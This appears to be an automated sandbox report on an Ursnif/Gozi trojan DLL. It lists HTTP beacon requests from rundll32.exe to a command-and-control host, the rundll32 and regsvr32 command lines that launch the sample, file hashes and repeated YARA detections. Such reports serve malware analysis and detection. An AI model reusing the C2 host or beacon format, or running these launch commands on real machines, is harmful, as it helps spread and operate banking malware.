Oct 21, 2022 00:27:20.607846022 CEST | 8779 | OUT | GET /drew/bBjIYvLPS6LWM/5hSIaVH5/Wq734Z_2BJdIJMJo3F9GITO/_2FcMitcTe/kWvqzZ_2B_2FKKbPA/PasXIoBqTiXU/g_2FlZW7Y_2/B41HTf6QrjFt_2/BVrbTt4PzlSq49i2n_2Bd/eYvDRtuGLt_2Fv6B/tiuwwj_2BAQltrY/i8qwn6NTmmAuX65G3U/G0pEw9pKd/5FnOrAI7ls4u0lmSvnEp/39rOvZP_2BCYyBu8UVC/tWjDwJwf88LN44CDcCSZK_/2BvPg5_2BjQiD/eLQzVCVR/WPugjRuufv7WeRl3hdeCsRv/aT5ChRiLQy/6L.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: linetwork.top
                  Connection: Keep-Alive
                  Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49744 | 62.173.145.183 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Oct 21, 2022 00:27:22.814107895 CEST | 8780 | OUT | GET /drew/NXo6zedpn_2B_/2BcanAQX/FnyJMATt_2F48kv6_2FGokp/FknJiZ4BPO/rcHYyBUZQ99j1sGoQ/3iqH_2FJ2MwI/44xXh3ewHre/Z3uYW8oE7cSgpQ/KoDoLpaNqGjAzcl7PDDtU/W4U8yO0BLXfpg6Fg/1LkQrB_2FwF36_2/F24Alce0F3ZIABc8fP/582wfkRmY/YYSggLyv6WiREP5aRpD7/BrtAiO3VnPYflPLClgV/qChVx2f_2BaPtkYL4DoePx/ugW_2FeHancyO/tXrlnouq/Hh9J5BBA0FEI0HWw67W05n9/zd1N.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: linetwork.top
                  Connection: Keep-Alive
                  Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49745 | 62.173.145.183 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Oct 21, 2022 00:27:25.963476896 CEST | 8781 | OUT | GET /drew/cLUzScwIGd6lPZFBgwJAB/boGs7r3rpKnEEW26/IZwhyzcbrBr1vrh/pacdkNsvfXz_2BJd7M/nIUnH5UJy/lraLufWTWWuSthVJSQnB/skwB6_2F4mYx1hncPnC/DX7TcGWo1RJRVk4zslIVLg/yTztrtFucPEpP/M0MfTI80/ZOv2XL0MhanRoGMyGX9uAoo/dmIzHKJR6c/gnzW6jLfOR7yWUymL/vvx15g4IZ4jD/aDLfgoeX_2F/HE40tKUB0xmnED/5US9_2FwaFREdIsGRoa7p/JuiKle06sqYmlLWx/l.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: linetwork.top
                  Connection: Keep-Alive
                  Cache-Control: no-cache


Target ID: 0
Start time: 00:24:55
Start date: 21/10/2022
Path: C:\Windows\System32\loaddll32.exe
Wow64 process (32bit): true
Commandline: loaddll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll"
Imagebase: 0xf20000
File size: 116736 bytes
MD5 hash: 1F562FBF37040EC6C43C8D5EF619EA39
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.817394092.0000000001379000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  Reputation: moderate

                  Target ID: 1
                  Start time: 00:24:55
                  Start date: 21/10/2022
                  Path: C:\Windows\System32\conhost.exe
                  Wow64 process (32bit): false
                  Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase: 0x7ff7c72c0000
                  File size: 625664 bytes
                  MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: high

                  Target ID: 2
                  Start time: 00:24:56
                  Start date: 21/10/2022
                  Path: C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit): true
                  Commandline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1
                  Imagebase: 0xd90000
                  File size: 232960 bytes
                  MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: high

                  Target ID: 3
                  Start time: 00:24:56
                  Start date: 21/10/2022
                  Path: C:\Windows\SysWOW64\regsvr32.exe
                  Wow64 process (32bit): true
                  Commandline: regsvr32.exe /s C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll
                  Imagebase: 0x70000
                  File size: 20992 bytes
                  MD5 hash: 426E7499F6A7346F0410DEAD0805586B
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.817437989.0000000004A49000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  Reputation: high

                  Target ID: 4
                  Start time: 00:24:56
                  Start date: 21/10/2022
                  Path: C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit): true
                  Commandline: rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1
                  Imagebase: 0xaf0000
                  File size: 61952 bytes
                  MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000002.817337923.00000000049B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  Reputation: high

                  Target ID: 5
                  Start time: 00:24:56
                  Start date: 21/10/2022
                  Path: C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit): true
                  Commandline: rundll32.exe C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll,DllRegisterServer
                  Imagebase: 0xaf0000
                  File size: 61952 bytes
                  MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000002.817370838.0000000004B09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  Reputation: high

                  No disassembly